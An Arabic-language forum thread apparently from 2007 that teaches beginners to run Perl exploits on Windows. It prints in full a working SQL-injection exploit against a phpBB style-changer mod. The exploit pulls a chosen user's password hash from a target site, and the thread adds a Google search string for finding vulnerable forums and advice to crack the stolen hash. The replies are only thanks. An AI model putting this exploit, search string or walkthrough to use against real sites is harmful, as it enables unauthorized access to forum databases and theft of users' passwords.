شرح طريقة استغلال ثغرات البيرل

ياعيون دلع · 11-13-2007, 11:55 PM

بسم الله الرحمن الرحيم
السلام عليكم ..
اليوم شباب غالى حشرح لكم طريقة استغلال ثغرات البيرل بعد الطلب من بعض المهتمين وعلى فكرة يا شباب فى ناس الانانية فى طبعهم تدخل تستفيد و من غير ان تضع كلمة شكر على الموضوع او على الاقل تفيد بأى معلومة جديدة يا ريت اشوف ردودكم و استفسارتكم
ندخل فى الجد بقى
طبعآ درس اليوم بيتكلم عن طريقة استغلال الثغرات المكتوبة بالغة من احد اللغات المعروفة و القوية ايضآ و هى لغة البيرل .. قبل ان نبدآ يجب ان نتعلم شىء مهم و هو كيفية معرفة الثغرات المكتوبة بالغة البيرل ..؟
عندما ننظر الى اى كود و نجد فى بدايتة :

رمز:
#!/usr/bin/perlاذآ علينا ان نعلم ان الثغرة التى سوف نتعامل معها هى احدى الثغرات المكتوبة بلغة البيرل ..
طريقة الاستغلال :
ــــــــــــــــــــــــــــــــــ
اولا:: اذا كنتم من مستخدمين بيئة الليونكس فهذا شىء ممتاز جدآ و لا حاجة لاى برنامج و اعتقد ايضآ انكم لستو فى حاجة لقرأة هذى الدرس .
اما اذا كنتم من مستخدمى بيئة الويندوز فعليكم بأستخدم برنامج ActivePerl
و ذالك لعمل كوبيلر لاكواد البيرل .
و هذة وصلة للبرنامج ::
http://www.cse.unsw.edu.au/~homecomp...SWin32-x86.msi
الان بعد تحميل البرنامج و عمل Setup لة على الجهاز سوف يكون على هذا المسار .

رمز:
C:\Perlالان كل شىء تمام نبدآ العمل
بعد ان نجد احد الثغرات مثال حناخد كمثال احد الثغرات اللى وضعتهم لكم فى قسم الثغرات و هى ::

رمز:
#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT #
#Created By SkOd #
#SED security Team #
#http://www.sed-team.be #
#skod.uk@gmail.com #
#ISRAEL #
################################################## #######
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
################################################## #######
use IO::Socket;
if (@ARGV < 3){
print q{
################################################## ##########
# phpBB Style Changer\Viewer MOD SQL injection Exploit #
# Tested on phpBB 2.0.19 #
# created By SkOd. SED Security Team #
################################################## ##########
bbstyle.pl [HOST] [PATH] [Target id]
bbstyle.pl www.host.com /phpbb2/ 2
################################################## ##########
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}اول شىء نعملة بعد معرفتنا ان هذا الكود لاحد ثغرات البيرل هو اننا نأخد الكود كلة Copy ونضعة Past فى الـ Notbad و نغلقها حيطلب منك عمل Save نضغط على كلمة Yes الان لدينا الكود على هيئة txt علينا ان نغير الامتداد من txt الى pl نفترض اننا سوف نقوم بتسمية الملف exploit.txt علينا ان نغير txt ليصبح بهذا الشكل exploit.pl الان و بعد التأكد من اتمام هذة العملية بنجاح علينا ان ضع الملف exploit.pl داخل الملف bin على هذا المسار

رمز:
C:\Perl\binو بعد و ضع الملف داخل هذا المجلد نذهب الى الـ Run الموجودة ضمن قائمة Start و نكتب cmd سيظهر لنا شاشة الدوس بهذا الشكل ::

و بعد ذالك ::

و بعد ان يتم عمل الترجمة لملف البيرل و يفتح امامنا سوف نشاهد طريقة الاستخدام الخاص لهذة الثغرة و كل ثغرة لها طريقة الاستخدام الخاصة بها و فى مثالنا هذا ::

و اعتقد المثال و اضح نكتب المطلوب بنفس الاسلوب اللى موجود فى الصورة اللى بالاعلى و نظغط انتر و شوفو النتيجة على حسب نوع الثغرة و عند الحصور على الباسورد بيكون بشكل مشفر ماعليك الا انك تفكة بأى برنامج او موقع من مواقع فك الباسورد ..
..:: اعزرونى اذا كان فى اى تقصير فى الشرح يا شباب و ان شاء الله اى استفسار انا حاضر ::..
و انتظرو شرح طريقة استغلال ثغرات الـ php و الــ Pm قريبآ ان شاء الله
تحياتى للجميع
برنـــــــ اوف دارك ــــــــــس

منقول للافاده

[img]

[/img]

zaradusht · 02-19-2008, 05:05 PM

بارك الله فيك اخي الغالي و جازاك الف خير على هذ الشرح المتميز معى اني اعرف ان الرد متأخر لكن اخي هذه اول مشارك لي في هذا المنتدى حياك الله اخي الكريم

عاشق الرومنسية · 02-24-2008, 08:38 PM

يسلمك ربي يالغالي

شرح متميز اوافي
لك جزيل الشكر والامتنان

تقبل تحياتي وتمنياتي 0-

02-24-2008, 08:38 PM	#3
عاشق الرومنسية -\|\|[عضو منــورنـا]\|\|- معدل تقييم المستوى: 0	يسلمك ربي يالغالي شرح متميز اوافي لك جزيل الشكر والامتنان تقبل تحياتي وتمنياتي 0- من مواضيع عاشق الرومنسية في المنتدى 0 استشارة 00-

أدوات الموضوع	إبحث في الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق	إبحث في الموضوع: البحث المتقدم

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
التلقيح الصناعي أو الإخصاب داخل أو خارج الجسم	مينوو	طب - صحه - غذاء - الطب البديل - اعشاب - ريجيم	6	02-13-2008 11:30 AM
أفضل 16 طريقة لجماع الزوجة	جداوي فله	طب - صحه - غذاء - الطب البديل - اعشاب - ريجيم	6	02-09-2008 01:42 AM
طريقة فتح كمبيوتر مقفل برقم سري (باسورد)	ღ الحــــزن ღ	برامج كمبيوتر	12	10-07-2007 06:49 PM

02-19-2008, 05:05 PM	#2
zaradusht -\|\|[عضو منــورنـا]\|\|- معدل تقييم المستوى: 0	بارك الله فيك اخي الغالي و جازاك الف خير على هذ الشرح المتميز معى اني اعرف ان الرد متأخر لكن اخي هذه اول مشارك لي في هذا المنتدى حياك الله اخي الكريم